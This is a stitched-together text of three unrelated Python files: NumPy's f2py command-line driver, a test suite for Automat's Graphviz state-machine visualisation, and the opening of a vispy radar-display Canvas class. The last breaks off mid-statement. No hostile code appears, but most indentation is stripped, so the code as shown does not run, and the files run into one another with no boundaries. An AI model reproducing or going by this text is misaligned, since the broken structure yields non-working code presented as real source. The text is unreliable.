#!/usr/bin/env python3
"""
f2py2e - Fortran to Python C/API generator. 2nd Edition.
See __usage__ below.
Copyright 1999--2011 Pearu Peterson all rights reserved,
Pearu Peterson <[email protected]>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/05/06 08:31:19 $
Pearu Peterson
"""
import sys
import os
import pprint
import re
from . import crackfortran
from . import rules
from . import cb_rules
from . import auxfuncs
from . import cfuncs
from . import f90mod_rules
from . import __version__
from . import capi_maps
f2py_version = __version__.version
numpy_version = __version__.version
errmess = sys.stderr.write
# outmess=sys.stdout.write
show = pprint.pprint
outmess = auxfuncs.outmess
__usage__ =\
f"""Usage:
1) To construct extension module sources:
f2py [<options>] <fortran files> [[[only:]||[skip:]] \\
<fortran functions> ] \\
[: <fortran files> ...]
2) To compile fortran files and build extension modules:
f2py -c [<options>, <build_flib options>, <extra options>] <fortran files>
3) To generate signature files:
f2py -h <filename.pyf> ...< same options as in (1) >
Description: This program generates a Python C/API file (<modulename>module.c)
that contains wrappers for given fortran functions so that they
can be called from Python. With the -c option the corresponding
extension modules are built.
Options:
--2d-numpy Use numpy.f2py tool with NumPy support. [DEFAULT]
--2d-numeric Use f2py2e tool with Numeric support.
--2d-numarray Use f2py2e tool with Numarray support.
--g3-numpy Use 3rd generation f2py from the separate f2py package.
[NOT AVAILABLE YET]
-h <filename> Write signatures of the fortran routines to file <filename>
and exit. You can then edit <filename> and use it instead
of <fortran files>. If <filename>==stdout then the
signatures are printed to stdout.
<fortran functions> Names of fortran routines for which Python C/API
functions will be generated. Default is all that are found
in <fortran files>.
<fortran files> Paths to fortran/signature files that will be scanned for
<fortran functions> in order to determine their signatures.
skip: Ignore fortran functions that follow until `:'.
only: Use only fortran functions that follow until `:'.
: Get back to <fortran files> mode.
-m <modulename> Name of the module; f2py generates a Python/C API
file <modulename>module.c or extension module <modulename>.
Default is 'untitled'.
'-include<header>' Writes additional headers in the C wrapper, can be passed
multiple times, generates #include <header> each time.
--[no-]lower Do [not] lower the cases in <fortran files>. By default,
--lower is assumed with -h key, and --no-lower without -h key.
--build-dir <dirname> All f2py generated files are created in <dirname>.
Default is tempfile.mkdtemp().
--overwrite-signature Overwrite existing signature file.
--[no-]latex-doc Create (or not) <modulename>module.tex.
Default is --no-latex-doc.
--short-latex Create 'incomplete' LaTeX document (without commands
\\documentclass, \\tableofcontents, and \\begin{{document}},
\\end{{document}}).
--[no-]rest-doc Create (or not) <modulename>module.rst.
Default is --no-rest-doc.
--debug-capi Create C/API code that reports the state of the wrappers
during runtime. Useful for debugging.
--[no-]wrap-functions Create Fortran subroutine wrappers to Fortran 77
functions. --wrap-functions is default because it ensures
maximum portability/compiler independence.
--include-paths <path1>:<path2>:... Search include files from the given
directories.
--help-link [..] List system resources found by system_info.py. See also
                       --link-<resource> switch below. [..] is an optional list
                       of resource names. E.g. try 'f2py --help-link lapack_opt'.
--f2cmap <filename> Load Fortran-to-Python KIND specification from the given
file. Default: .f2py_f2cmap in current directory.
--quiet Run quietly.
--verbose Run with extra verbosity.
-v Print f2py version ID and exit.
numpy.distutils options (only effective with -c):
--fcompiler= Specify Fortran compiler type by vendor
--compiler= Specify C compiler type (as defined by distutils)
--help-fcompiler List available Fortran compilers and exit
--f77exec= Specify the path to F77 compiler
--f90exec= Specify the path to F90 compiler
--f77flags= Specify F77 compiler flags
--f90flags= Specify F90 compiler flags
--opt= Specify optimization flags
--arch= Specify architecture specific optimization flags
--noopt Compile without optimization
--noarch Compile without arch-dependent optimization
--debug Compile with debugging information
Extra options (only effective with -c):
--link-<resource> Link extension module with <resource> as defined
by numpy.distutils/system_info.py. E.g. to link
with optimized LAPACK libraries (vecLib on MacOSX,
ATLAS elsewhere), use --link-lapack_opt.
See also --help-link switch.
-L/path/to/lib/ -l<libname>
-D<define> -U<name>
-I/path/to/include/
<filename>.o <filename>.so <filename>.a
Using the following macros may be required with non-gcc Fortran
compilers:
-DPREPEND_FORTRAN -DNO_APPEND_FORTRAN -DUPPERCASE_FORTRAN
-DUNDERSCORE_G77
  When using -DF2PY_REPORT_ATEXIT, a performance report of the F2PY
  interface is printed out at exit (platforms: Linux).
  When using -DF2PY_REPORT_ON_ARRAY_COPY=<int>, a message is
  sent to stderr whenever the F2PY interface makes a copy of an
  array. The integer <int> sets the array-size threshold above which
  such a message is shown.
Version: {f2py_version}
numpy Version: {numpy_version}
Requires: Python 3.5 or higher.
License: NumPy license (see LICENSE.txt in the NumPy source code)
Copyright 1999 - 2011 Pearu Peterson all rights reserved.
https://web.archive.org/web/20140822061353/http://cens.ioc.ee/projects/f2py2e"""
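# Typical invocations, illustrating the usage text above ('fib.f' and the
# module name 'fib' are hypothetical):
#   f2py -m fib fib.f             # generate fibmodule.c
#   f2py -h fib.pyf -m fib fib.f  # write a signature file for later editing
#   f2py -c -m fib fib.f          # compile and build the extension module fib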
def scaninputline(inputline):
files, skipfuncs, onlyfuncs, debug = [], [], [], []
f, f2, f3, f5, f6, f7, f8, f9, f10 = 1, 0, 0, 0, 0, 0, 0, 0, 0
verbose = 1
dolc = -1
dolatexdoc = 0
dorestdoc = 0
wrapfuncs = 1
buildpath = '.'
include_paths = []
signsfile, modulename = None, None
options = {'buildpath': buildpath,
'coutput': None,
'f2py_wrapper_output': None}
for l in inputline:
if l == '':
pass
elif l == 'only:':
f = 0
elif l == 'skip:':
f = -1
elif l == ':':
f = 1
elif l[:8] == '--debug-':
debug.append(l[8:])
elif l == '--lower':
dolc = 1
elif l == '--build-dir':
f6 = 1
elif l == '--no-lower':
dolc = 0
elif l == '--quiet':
verbose = 0
elif l == '--verbose':
verbose += 1
elif l == '--latex-doc':
dolatexdoc = 1
elif l == '--no-latex-doc':
dolatexdoc = 0
elif l == '--rest-doc':
dorestdoc = 1
elif l == '--no-rest-doc':
dorestdoc = 0
elif l == '--wrap-functions':
wrapfuncs = 1
elif l == '--no-wrap-functions':
wrapfuncs = 0
elif l == '--short-latex':
options['shortlatex'] = 1
elif l == '--coutput':
f8 = 1
elif l == '--f2py-wrapper-output':
f9 = 1
elif l == '--f2cmap':
f10 = 1
elif l == '--overwrite-signature':
options['h-overwrite'] = 1
elif l == '-h':
f2 = 1
elif l == '-m':
f3 = 1
elif l[:2] == '-v':
print(f2py_version)
sys.exit()
elif l == '--show-compilers':
f5 = 1
elif l[:8] == '-include':
cfuncs.outneeds['userincludes'].append(l[9:-1])
cfuncs.userincludes[l[9:-1]] = '#include ' + l[8:]
        elif l[:15] == '--include_paths':
            outmess(
                'f2py option --include_paths is deprecated, use --include-paths instead.\n')
            f7 = 1
        elif l[:15] == '--include-paths':
            f7 = 1
elif l[0] == '-':
errmess('Unknown option %s\n' % repr(l))
sys.exit()
elif f2:
f2 = 0
signsfile = l
elif f3:
f3 = 0
modulename = l
elif f6:
f6 = 0
buildpath = l
elif f7:
f7 = 0
include_paths.extend(l.split(os.pathsep))
elif f8:
f8 = 0
options["coutput"] = l
elif f9:
f9 = 0
options["f2py_wrapper_output"] = l
elif f10:
f10 = 0
options["f2cmap_file"] = l
elif f == 1:
try:
with open(l):
pass
files.append(l)
except OSError as detail:
errmess(f'OSError: {detail!s}. Skipping file "{l!s}".\n')
elif f == -1:
skipfuncs.append(l)
elif f == 0:
onlyfuncs.append(l)
if not f5 and not files and not modulename:
print(__usage__)
sys.exit()
if not os.path.isdir(buildpath):
if not verbose:
outmess('Creating build directory %s\n' % (buildpath))
os.mkdir(buildpath)
if signsfile:
signsfile = os.path.join(buildpath, signsfile)
if signsfile and os.path.isfile(signsfile) and 'h-overwrite' not in options:
errmess(
'Signature file "%s" exists!!! Use --overwrite-signature to overwrite.\n' % (signsfile))
sys.exit()
options['debug'] = debug
options['verbose'] = verbose
if dolc == -1 and not signsfile:
options['do-lower'] = 0
else:
options['do-lower'] = dolc
if modulename:
options['module'] = modulename
if signsfile:
options['signsfile'] = signsfile
if onlyfuncs:
options['onlyfuncs'] = onlyfuncs
if skipfuncs:
options['skipfuncs'] = skipfuncs
options['dolatexdoc'] = dolatexdoc
options['dorestdoc'] = dorestdoc
options['wrapfuncs'] = wrapfuncs
options['buildpath'] = buildpath
options['include_paths'] = include_paths
options.setdefault('f2cmap_file', None)
return files, options
def callcrackfortran(files, options):
rules.options = options
crackfortran.debug = options['debug']
crackfortran.verbose = options['verbose']
if 'module' in options:
crackfortran.f77modulename = options['module']
if 'skipfuncs' in options:
crackfortran.skipfuncs = options['skipfuncs']
if 'onlyfuncs' in options:
crackfortran.onlyfuncs = options['onlyfuncs']
crackfortran.include_paths[:] = options['include_paths']
crackfortran.dolowercase = options['do-lower']
postlist = crackfortran.crackfortran(files)
if 'signsfile' in options:
outmess('Saving signatures to file "%s"\n' % (options['signsfile']))
pyf = crackfortran.crack2fortran(postlist)
if options['signsfile'][-6:] == 'stdout':
sys.stdout.write(pyf)
else:
with open(options['signsfile'], 'w') as f:
f.write(pyf)
if options["coutput"] is None:
for mod in postlist:
mod["coutput"] = "%smodule.c" % mod["name"]
else:
for mod in postlist:
mod["coutput"] = options["coutput"]
if options["f2py_wrapper_output"] is None:
for mod in postlist:
mod["f2py_wrapper_output"] = "%s-f2pywrappers.f" % mod["name"]
else:
for mod in postlist:
mod["f2py_wrapper_output"] = options["f2py_wrapper_output"]
return postlist
def buildmodules(lst):
cfuncs.buildcfuncs()
outmess('Building modules...\n')
modules, mnames, isusedby = [], [], {}
for item in lst:
if '__user__' in item['name']:
cb_rules.buildcallbacks(item)
else:
if 'use' in item:
for u in item['use'].keys():
if u not in isusedby:
isusedby[u] = []
isusedby[u].append(item['name'])
modules.append(item)
mnames.append(item['name'])
ret = {}
for module, name in zip(modules, mnames):
if name in isusedby:
outmess('\tSkipping module "%s" which is used by %s.\n' % (
name, ','.join('"%s"' % s for s in isusedby[name])))
else:
um = []
if 'use' in module:
for u in module['use'].keys():
if u in isusedby and u in mnames:
um.append(modules[mnames.index(u)])
else:
outmess(
f'\tModule "{name}" uses nonexisting "{u}" '
'which will be ignored.\n')
ret[name] = {}
dict_append(ret[name], rules.buildmodule(module, um))
return ret
def dict_append(d_out, d_in):
for (k, v) in d_in.items():
if k not in d_out:
d_out[k] = []
if isinstance(v, list):
d_out[k] = d_out[k] + v
else:
d_out[k].append(v)
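# Illustrative behaviour of dict_append (hypothetical values): starting from
# d = {'csrc': ['a.c']}, dict_append(d, {'csrc': ['b.c'], 'h': 'x.h'}) leaves
# d == {'csrc': ['a.c', 'b.c'], 'h': ['x.h']} -- list values are concatenated,
# scalar values are appended to a (possibly new) list.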
def run_main(comline_list):
"""
Equivalent to running::
f2py <args>
    where ``<args> = ' '.join(<comline_list>)``, but in Python. Unless
    ``-h`` is used, this function returns a dictionary containing
    information on generated modules and their dependencies on source
    files. For example, the command ``f2py -m scalar scalar.f`` can be
    executed from Python as shown in the Examples section below.

    You cannot build extension modules with this function, that is,
    using ``-c`` is not allowed. Use the ``compile`` command instead.
Examples
--------
.. literalinclude:: ../../source/f2py/code/results/run_main_session.dat
:language: python
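
    A minimal interactive sketch (assuming a Fortran source file ``scalar.f``
    exists in the current directory)::

        >>> import numpy.f2py
        >>> r = numpy.f2py.run_main(['-m', 'scalar', 'scalar.f'])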
"""
crackfortran.reset_global_f2py_vars()
f2pydir = os.path.dirname(os.path.abspath(cfuncs.__file__))
fobjhsrc = os.path.join(f2pydir, 'src', 'fortranobject.h')
fobjcsrc = os.path.join(f2pydir, 'src', 'fortranobject.c')
files, options = scaninputline(comline_list)
auxfuncs.options = options
capi_maps.load_f2cmap_file(options['f2cmap_file'])
postlist = callcrackfortran(files, options)
isusedby = {}
for plist in postlist:
if 'use' in plist:
for u in plist['use'].keys():
if u not in isusedby:
isusedby[u] = []
isusedby[u].append(plist['name'])
for plist in postlist:
if plist['block'] == 'python module' and '__user__' in plist['name']:
if plist['name'] in isusedby:
# if not quiet:
outmess(
f'Skipping Makefile build for module "{plist["name"]}" '
'which is used by {}\n'.format(
','.join(f'"{s}"' for s in isusedby[plist['name']])))
if 'signsfile' in options:
if options['verbose'] > 1:
outmess(
'Stopping. Edit the signature file and then run f2py on the signature file: ')
outmess('%s %s\n' %
(os.path.basename(sys.argv[0]), options['signsfile']))
return
for plist in postlist:
if plist['block'] != 'python module':
if 'python module' not in options:
errmess(
'Tip: If your original code is Fortran source then you must use -m option.\n')
            raise TypeError('All blocks must be python module blocks but got %s' % (
                repr(plist['block'])))
auxfuncs.debugoptions = options['debug']
f90mod_rules.options = options
auxfuncs.wrapfuncs = options['wrapfuncs']
ret = buildmodules(postlist)
for mn in ret.keys():
dict_append(ret[mn], {'csrc': fobjcsrc, 'h': fobjhsrc})
return ret
def filter_files(prefix, suffix, files, remove_prefix=None):
"""
Filter files by prefix and suffix.
"""
filtered, rest = [], []
match = re.compile(prefix + r'.*' + suffix + r'\Z').match
if remove_prefix:
ind = len(prefix)
else:
ind = 0
for file in [x.strip() for x in files]:
if match(file):
filtered.append(file[ind:])
else:
rest.append(file)
return filtered, rest
def get_prefix(module):
p = os.path.dirname(os.path.dirname(module.__file__))
return p
def run_compile():
"""
Do it all in one call!
"""
import tempfile
i = sys.argv.index('-c')
del sys.argv[i]
remove_build_dir = 0
try:
i = sys.argv.index('--build-dir')
except ValueError:
i = None
if i is not None:
build_dir = sys.argv[i + 1]
del sys.argv[i + 1]
del sys.argv[i]
else:
remove_build_dir = 1
build_dir = tempfile.mkdtemp()
_reg1 = re.compile(r'--link-')
sysinfo_flags = [_m for _m in sys.argv[1:] if _reg1.match(_m)]
sys.argv = [_m for _m in sys.argv if _m not in sysinfo_flags]
if sysinfo_flags:
sysinfo_flags = [f[7:] for f in sysinfo_flags]
_reg2 = re.compile(
r'--((no-|)(wrap-functions|lower)|debug-capi|quiet)|-include')
f2py_flags = [_m for _m in sys.argv[1:] if _reg2.match(_m)]
sys.argv = [_m for _m in sys.argv if _m not in f2py_flags]
f2py_flags2 = []
fl = 0
for a in sys.argv[1:]:
if a in ['only:', 'skip:']:
fl = 1
elif a == ':':
fl = 0
if fl or a == ':':
f2py_flags2.append(a)
if f2py_flags2 and f2py_flags2[-1] != ':':
f2py_flags2.append(':')
f2py_flags.extend(f2py_flags2)
sys.argv = [_m for _m in sys.argv if _m not in f2py_flags2]
_reg3 = re.compile(
r'--((f(90)?compiler(-exec|)|compiler)=|help-compiler)')
flib_flags = [_m for _m in sys.argv[1:] if _reg3.match(_m)]
sys.argv = [_m for _m in sys.argv if _m not in flib_flags]
_reg4 = re.compile(
r'--((f(77|90)(flags|exec)|opt|arch)=|(debug|noopt|noarch|help-fcompiler))')
fc_flags = [_m for _m in sys.argv[1:] if _reg4.match(_m)]
sys.argv = [_m for _m in sys.argv if _m not in fc_flags]
del_list = []
for s in flib_flags:
v = '--fcompiler='
if s[:len(v)] == v:
from numpy.distutils import fcompiler
fcompiler.load_all_fcompiler_classes()
allowed_keys = list(fcompiler.fcompiler_class.keys())
nv = ov = s[len(v):].lower()
if ov not in allowed_keys:
vmap = {} # XXX
try:
nv = vmap[ov]
except KeyError:
if ov not in vmap.values():
print('Unknown vendor: "%s"' % (s[len(v):]))
nv = ov
i = flib_flags.index(s)
flib_flags[i] = '--fcompiler=' + nv
continue
for s in del_list:
i = flib_flags.index(s)
del flib_flags[i]
assert len(flib_flags) <= 2, repr(flib_flags)
_reg5 = re.compile(r'--(verbose)')
setup_flags = [_m for _m in sys.argv[1:] if _reg5.match(_m)]
sys.argv = [_m for _m in sys.argv if _m not in setup_flags]
if '--quiet' in f2py_flags:
setup_flags.append('--quiet')
modulename = 'untitled'
sources = sys.argv[1:]
for optname in ['--include_paths', '--include-paths', '--f2cmap']:
if optname in sys.argv:
i = sys.argv.index(optname)
f2py_flags.extend(sys.argv[i:i + 2])
del sys.argv[i + 1], sys.argv[i]
sources = sys.argv[1:]
if '-m' in sys.argv:
i = sys.argv.index('-m')
modulename = sys.argv[i + 1]
del sys.argv[i + 1], sys.argv[i]
sources = sys.argv[1:]
else:
from numpy.distutils.command.build_src import get_f2py_modulename
pyf_files, sources = filter_files('', '[.]pyf([.]src|)', sources)
sources = pyf_files + sources
for f in pyf_files:
modulename = get_f2py_modulename(f)
if modulename:
break
extra_objects, sources = filter_files('', '[.](o|a|so|dylib)', sources)
include_dirs, sources = filter_files('-I', '', sources, remove_prefix=1)
library_dirs, sources = filter_files('-L', '', sources, remove_prefix=1)
libraries, sources = filter_files('-l', '', sources, remove_prefix=1)
undef_macros, sources = filter_files('-U', '', sources, remove_prefix=1)
define_macros, sources = filter_files('-D', '', sources, remove_prefix=1)
for i in range(len(define_macros)):
name_value = define_macros[i].split('=', 1)
if len(name_value) == 1:
name_value.append(None)
if len(name_value) == 2:
define_macros[i] = tuple(name_value)
else:
print('Invalid use of -D:', name_value)
from numpy.distutils.system_info import get_info
num_info = {}
if num_info:
include_dirs.extend(num_info.get('include_dirs', []))
from numpy.distutils.core import setup, Extension
ext_args = {'name': modulename, 'sources': sources,
'include_dirs': include_dirs,
'library_dirs': library_dirs,
'libraries': libraries,
'define_macros': define_macros,
'undef_macros': undef_macros,
'extra_objects': extra_objects,
'f2py_options': f2py_flags,
}
if sysinfo_flags:
from numpy.distutils.misc_util import dict_append
for n in sysinfo_flags:
i = get_info(n)
if not i:
outmess('No %s resources found in system'
' (try `f2py --help-link`)\n' % (repr(n)))
dict_append(ext_args, **i)
ext = Extension(**ext_args)
sys.argv = [sys.argv[0]] + setup_flags
sys.argv.extend(['build',
'--build-temp', build_dir,
'--build-base', build_dir,
'--build-platlib', '.',
# disable CCompilerOpt
'--disable-optimization'])
if fc_flags:
sys.argv.extend(['config_fc'] + fc_flags)
if flib_flags:
sys.argv.extend(['build_ext'] + flib_flags)
setup(ext_modules=[ext])
if remove_build_dir and os.path.exists(build_dir):
import shutil
outmess('Removing build directory %s\n' % (build_dir))
shutil.rmtree(build_dir)
def main():
if '--help-link' in sys.argv[1:]:
sys.argv.remove('--help-link')
from numpy.distutils.system_info import show_all
show_all()
return
# Probably outdated options that were not working before 1.16
if '--g3-numpy' in sys.argv[1:]:
sys.stderr.write("G3 f2py support is not implemented, yet.\\n")
sys.exit(1)
elif '--2e-numeric' in sys.argv[1:]:
sys.argv.remove('--2e-numeric')
elif '--2e-numarray' in sys.argv[1:]:
        # Note that this errors because the -DNUMARRAY argument is
        # not recognized. Just here for backwards compatibility and the
        # error message.
sys.argv.append("-DNUMARRAY")
sys.argv.remove('--2e-numarray')
elif '--2e-numpy' in sys.argv[1:]:
sys.argv.remove('--2e-numpy')
else:
pass
if '-c' in sys.argv[1:]:
run_compile()
else:
run_main(sys.argv[1:])
from __future__ import print_function
import functools
import os
import subprocess
from unittest import TestCase, skipIf
import attr
from .._methodical import MethodicalMachine
from .test_discover import isTwistedInstalled
def isGraphvizModuleInstalled():
"""
Is the graphviz Python module installed?
"""
try:
__import__("graphviz")
except ImportError:
return False
else:
return True
def isGraphvizInstalled():
"""
Are the graphviz tools installed?
"""
r, w = os.pipe()
os.close(w)
try:
return not subprocess.call("dot", stdin=r, shell=True)
finally:
os.close(r)
def sampleMachine():
"""
Create a sample L{MethodicalMachine} with some sample states.
"""
mm = MethodicalMachine()
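    # A minimal two-state machine: 'begin' (initial) transitions to 'end' on
    # the 'go' input, emitting the 'out' output along the way.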
class SampleObject(object):
@mm.state(initial=True)
def begin(self):
"initial state"
@mm.state()
def end(self):
"end state"
@mm.input()
def go(self):
"sample input"
@mm.output()
def out(self):
"sample output"
begin.upon(go, end, [out])
so = SampleObject()
so.go()
return mm
@skipIf(not isGraphvizModuleInstalled(), "Graphviz module is not installed.")
class ElementMakerTests(TestCase):
"""
L{elementMaker} generates HTML representing the specified element.
"""
def setUp(self):
from .._visualize import elementMaker
self.elementMaker = elementMaker
def test_sortsAttrs(self):
"""
L{elementMaker} orders HTML attributes lexicographically.
"""
expected = r'<div a="1" b="2" c="3"></div>'
self.assertEqual(expected,
self.elementMaker("div",
b='2',
a='1',
c='3'))
def test_quotesAttrs(self):
"""
L{elementMaker} quotes HTML attributes according to DOT's quoting rule.
See U{http://www.graphviz.org/doc/info/lang.html}, footnote 1.
"""
expected = r'<div a="1" b="a \" quote" c="a string"></div>'
self.assertEqual(expected,
self.elementMaker("div",
b='a " quote',
a=1,
c="a string"))
def test_noAttrs(self):
"""
L{elementMaker} should render an element with no attributes.
"""
expected = r'<div ></div>'
self.assertEqual(expected, self.elementMaker("div"))
@attr.s
class HTMLElement(object):
"""Holds an HTML element, as created by elementMaker."""
name = attr.ib()
children = attr.ib()
attributes = attr.ib()
def findElements(element, predicate):
"""
Recursively collect all elements in an L{HTMLElement} tree that
    match the given predicate.
"""
if predicate(element):
return [element]
elif isLeaf(element):
return []
return [result
for child in element.children
for result in findElements(child, predicate)]
def isLeaf(element):
"""
    Is this HTML element actually a leaf node (i.e. not an L{HTMLElement})?
"""
return not isinstance(element, HTMLElement)
@skipIf(not isGraphvizModuleInstalled(), "Graphviz module is not installed.")
class TableMakerTests(TestCase):
"""
Tests that ensure L{tableMaker} generates HTML tables usable as
labels in DOT graphs.
For more information, read the "HTML-Like Labels" section of
U{http://www.graphviz.org/doc/info/shapes.html}.
"""
def fakeElementMaker(self, name, *children, **attributes):
return HTMLElement(name=name, children=children, attributes=attributes)
def setUp(self):
from .._visualize import tableMaker
self.inputLabel = "input label"
self.port = "the port"
self.tableMaker = functools.partial(tableMaker,
_E=self.fakeElementMaker)
def test_inputLabelRow(self):
"""
The table returned by L{tableMaker} always contains the input
symbol label in its first row, and that row contains one cell
with a port attribute set to the provided port.
"""
def hasPort(element):
return (not isLeaf(element)
and element.attributes.get("port") == self.port)
for outputLabels in ([], ["an output label"]):
table = self.tableMaker(self.inputLabel, outputLabels,
port=self.port)
self.assertGreater(len(table.children), 0)
inputLabelRow = table.children[0]
portCandidates = findElements(table, hasPort)
self.assertEqual(len(portCandidates), 1)
self.assertEqual(portCandidates[0].name, "td")
self.assertEqual(findElements(inputLabelRow, isLeaf),
[self.inputLabel])
def test_noOutputLabels(self):
"""
        L{tableMaker} does not add a colspan attribute to the input
        label's cell, nor a second row, if there are no output labels.
"""
table = self.tableMaker("input label", (), port=self.port)
self.assertEqual(len(table.children), 1)
(inputLabelRow,) = table.children
self.assertNotIn("colspan", inputLabelRow.attributes)
def test_withOutputLabels(self):
"""
L{tableMaker} adds a colspan attribute to the input label's cell
equal to the number of output labels and a second row that
contains the output labels.
"""
table = self.tableMaker(self.inputLabel, ("output label 1",
"output label 2"),
port=self.port)
self.assertEqual(len(table.children), 2)
inputRow, outputRow = table.children
def hasCorrectColspan(element):
return (not isLeaf(element)
and element.name == "td"
and element.attributes.get('colspan') == "2")
self.assertEqual(len(findElements(inputRow, hasCorrectColspan)),
1)
self.assertEqual(findElements(outputRow, isLeaf), ["output label 1",
"output label 2"])
@skipIf(not isGraphvizModuleInstalled(), "Graphviz module is not installed.")
@skipIf(not isGraphvizInstalled(), "Graphviz tools are not installed.")
class IntegrationTests(TestCase):
"""
Tests which make sure Graphviz can understand the output produced by
Automat.
"""
def test_validGraphviz(self):
"""
L{graphviz} emits valid graphviz data.
"""
p = subprocess.Popen("dot", stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
out, err = p.communicate("".join(sampleMachine().asDigraph())
.encode("utf-8"))
self.assertEqual(p.returncode, 0)
@skipIf(not isGraphvizModuleInstalled(), "Graphviz module is not installed.")
class SpotChecks(TestCase):
"""
Tests to make sure that the output contains salient features of the machine
being generated.
"""
def test_containsMachineFeatures(self):
"""
The output of L{graphviz} should contain the names of the states,
inputs, outputs in the state machine.
"""
gvout = "".join(sampleMachine().asDigraph())
self.assertIn("begin", gvout)
self.assertIn("end", gvout)
self.assertIn("go", gvout)
self.assertIn("out", gvout)
class RecordsDigraphActions(object):
"""
Records calls made to L{FakeDigraph}.
"""
def __init__(self):
self.reset()
def reset(self):
self.renderCalls = []
self.saveCalls = []
class FakeDigraph(object):
"""
A fake L{graphviz.Digraph}. Instantiate it with a
L{RecordsDigraphActions}.
"""
def __init__(self, recorder):
self._recorder = recorder
def render(self, **kwargs):
self._recorder.renderCalls.append(kwargs)
def save(self, **kwargs):
self._recorder.saveCalls.append(kwargs)
class FakeMethodicalMachine(object):
"""
A fake L{MethodicalMachine}. Instantiate it with a L{FakeDigraph}
"""
def __init__(self, digraph):
self._digraph = digraph
def asDigraph(self):
return self._digraph
@skipIf(not isGraphvizModuleInstalled(), "Graphviz module is not installed.")
@skipIf(not isGraphvizInstalled(), "Graphviz tools are not installed.")
@skipIf(not isTwistedInstalled(), "Twisted is not installed.")
class VisualizeToolTests(TestCase):
def setUp(self):
self.digraphRecorder = RecordsDigraphActions()
self.fakeDigraph = FakeDigraph(self.digraphRecorder)
self.fakeProgname = 'tool-test'
self.fakeSysPath = ['ignored']
self.collectedOutput = []
self.fakeFQPN = 'fake.fqpn'
def collectPrints(self, *args):
self.collectedOutput.append(' '.join(args))
def fakeFindMachines(self, fqpn):
yield fqpn, FakeMethodicalMachine(self.fakeDigraph)
def tool(self,
progname=None,
argv=None,
syspath=None,
findMachines=None,
print=None):
from .._visualize import tool
return tool(
_progname=progname or self.fakeProgname,
_argv=argv or [self.fakeFQPN],
_syspath=syspath or self.fakeSysPath,
_findMachines=findMachines or self.fakeFindMachines,
_print=print or self.collectPrints)
def test_checksCurrentDirectory(self):
"""
L{tool} adds '' to sys.path to ensure
L{automat._discover.findMachines} searches the current
directory.
"""
self.tool(argv=[self.fakeFQPN])
self.assertEqual(self.fakeSysPath[0], '')
def test_quietHidesOutput(self):
"""
Passing -q/--quiet hides all output.
"""
self.tool(argv=[self.fakeFQPN, '--quiet'])
self.assertFalse(self.collectedOutput)
self.tool(argv=[self.fakeFQPN, '-q'])
self.assertFalse(self.collectedOutput)
def test_onlySaveDot(self):
"""
Passing an empty string for --image-directory/-i disables
rendering images.
"""
for arg in ('--image-directory', '-i'):
self.digraphRecorder.reset()
self.collectedOutput = []
self.tool(argv=[self.fakeFQPN, arg, ''])
self.assertFalse(any("image" in line
for line in self.collectedOutput))
self.assertEqual(len(self.digraphRecorder.saveCalls), 1)
(call,) = self.digraphRecorder.saveCalls
self.assertEqual("{}.dot".format(self.fakeFQPN),
call['filename'])
self.assertFalse(self.digraphRecorder.renderCalls)
def test_saveOnlyImage(self):
"""
Passing an empty string for --dot-directory/-d disables saving dot
files.
"""
for arg in ('--dot-directory', '-d'):
self.digraphRecorder.reset()
self.collectedOutput = []
self.tool(argv=[self.fakeFQPN, arg, ''])
self.assertFalse(any("dot" in line
for line in self.collectedOutput))
self.assertEqual(len(self.digraphRecorder.renderCalls), 1)
(call,) = self.digraphRecorder.renderCalls
self.assertEqual("{}.dot".format(self.fakeFQPN),
call['filename'])
self.assertTrue(call['cleanup'])
self.assertFalse(self.digraphRecorder.saveCalls)
def test_saveDotAndImagesInDifferentDirectories(self):
"""
Passing different directories to --image-directory and --dot-directory
writes images and dot files to those directories.
"""
imageDirectory = 'image'
dotDirectory = 'dot'
self.tool(argv=[self.fakeFQPN,
'--image-directory', imageDirectory,
'--dot-directory', dotDirectory])
self.assertTrue(any("image" in line
for line in self.collectedOutput))
self.assertTrue(any("dot" in line
for line in self.collectedOutput))
self.assertEqual(len(self.digraphRecorder.renderCalls), 1)
(renderCall,) = self.digraphRecorder.renderCalls
self.assertEqual(renderCall["directory"], imageDirectory)
self.assertTrue(renderCall['cleanup'])
self.assertEqual(len(self.digraphRecorder.saveCalls), 1)
(saveCall,) = self.digraphRecorder.saveCalls
self.assertEqual(saveCall["directory"], dotDirectory)
def test_saveDotAndImagesInSameDirectory(self):
"""
Passing the same directory to --image-directory and --dot-directory
writes images and dot files to that one directory.
"""
directory = 'imagesAndDot'
self.tool(argv=[self.fakeFQPN,
'--image-directory', directory,
'--dot-directory', directory])
self.assertTrue(any("image and dot" in line
for line in self.collectedOutput))
self.assertEqual(len(self.digraphRecorder.renderCalls), 1)
(renderCall,) = self.digraphRecorder.renderCalls
self.assertEqual(renderCall["directory"], directory)
self.assertFalse(renderCall['cleanup'])
self.assertFalse(len(self.digraphRecorder.saveCalls))
import numpy as np
from collection import RadarFileCollection
from pyart.core.transforms import antenna_vectors_to_cartesian, corner_to_point
from quadmesh_geometry import mesh_from_quads, radar_example_data
from vispy import gloo
import vispy
import vispy.app
# from vispy.scene.widgets import ViewBox
from vispy.scene.visuals import Mesh, Text
from vispy.geometry import MeshData
from vispy.scene import STTransform, ChainTransform, MatrixTransform
from matplotlib.cm import ScalarMappable
from matplotlib.colors import Normalize
import glob
class Canvas(vispy.scene.SceneCanvas):
def __init__(self, size=(800, 800), name="Radar Loop",
timer_interval=1.0,
num_radars=1,
radar_filenames=None,
radar_latlons=None,
radar_fields=None,
time_start=None, time_end=None,
loop_step=10, image_duration=10):
'''
Parameters
----------
size : 2-tuple int
(x, y) size in pixels of window.
name : str
Name to use in window label.
timer_interval : float
Interval at which to update data in window.
num_radars : int
The number of radars to display.
radar_filenames : list
List of radar filenames to process. This can be a list of lists
if multiple radars are desired. num_radars must be > 1.
        radar_latlons : list of tuples
            List of (latitude, longitude) coordinates. This can be a list
            of the same length as radar_filenames. num_radars must be > 1.
        radar_fields : list of str, optional
            Radar field names to display, one per radar. Any radar without an
            entry falls back to 'reflectivity'.
time_start : datetime instance
Start time to use for subset.
time_end : datetime instance
End time to use for subset.
loop_step : float
Seconds between image update in frame.
image_duration : float
Seconds that each image will last in frame.
'''
# self.vb = scene.widgets.ViewBox(parent=self.scene, border_color='b')
# vb.camera.rect = 0, 0, 1, 1
# self.rotation = MatrixTransform()
# Perform a couple of checks
if radar_filenames is None:
print("Must provide a list of filenames!")
return
        if (num_radars > 1) and ((len(radar_filenames) != num_radars) or
